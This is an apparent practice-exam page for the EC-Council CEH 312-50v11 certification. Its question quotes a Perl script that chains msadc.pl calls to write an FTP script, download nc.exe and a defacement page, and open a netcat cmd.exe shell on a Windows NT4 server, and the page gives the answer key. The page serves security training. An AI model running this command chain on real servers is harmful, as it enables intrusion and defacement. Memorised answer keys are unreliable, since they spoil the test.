nerdexam
EC-Council

312-50V11 · Question #303

A tester has been using the msadc.pl attack script to execute arbitrary commands on a Windows NT4 web server. While it is effective, the tester finds it tedious to perform extended functions. On furth

The correct answer is B. A chained exploit. The script chains multiple sequential calls to msadc.pl to build an FTP command file and execute it, which is the definition of a chained exploit.

System Hacking

Question

A tester has been using the msadc.pl attack script to execute arbitrary commands on a Windows NT4 web server. While it is effective, the tester finds it tedious to perform extended functions. On further research, the tester come across a perl script that runs the following msadc functions:

system("perl msadc.pl -h $host -C "echo open $your >testfile""); system("perl msadc.pl -h $host -C "echo $user>>testfile""); system("perl msadc.pl -h $host -C "echo $pass>>testfile""); system("perl msadc.pl -h $host -C "echo bin>>testfile""); system("perl msadc.pl -h $host -C "echo get nc.exe>>testfile""); system("perl msadc.pl -h $host -C "echo get hacked.html>>testfile""); ("perl msadc.pl -h $host -C "echo quit>>testfile""); system("perl msadc.pl -h $host -C "ftp -s:testfile""); $o=; print "Opening ...\n"; system("perl msadc.pl -h $host -C "nc -l -p $port -e cmd.exe""); Which exploit is indicated by this script?

Options

  • AA buffer overflow exploit
  • BA chained exploit
  • CA SQL injection exploit
  • DA denial of service exploit

How the community answered

(23 responses)
  • A
    4% (1)
  • B
    70% (16)
  • C
    9% (2)
  • D
    17% (4)

Why each option

The script chains multiple sequential calls to msadc.pl to build an FTP command file and execute it, which is the definition of a chained exploit.

AA buffer overflow exploit

A buffer overflow exploit overwrites adjacent memory to redirect execution flow - no memory boundary manipulation is present in these chained FTP command sequences.

BA chained exploitCorrect

A chained exploit combines multiple steps or vulnerability invocations in sequence where each step depends on the previous to ultimately achieve a goal beyond any single step. Here, repeated msadc.pl calls progressively write FTP commands into 'testfile', then FTP is invoked with that script to download netcat (nc.exe) and other payloads - creating a clear chain of dependent exploitation steps.

CA SQL injection exploit

A SQL injection exploit injects malicious SQL syntax into database queries via unsanitized input - no database interaction or SQL manipulation is occurring here.

DA denial of service exploit

A denial of service exploit aims to exhaust resources and make a service unavailable - this script is focused on gaining access and downloading tools, not disrupting availability.

Concept tested: Identifying chained exploit attack techniques

Topics

#chained exploit#MSADC#netcat#Windows NT

Community Discussion

No community discussion yet for this question.

Full 312-50V11 Practice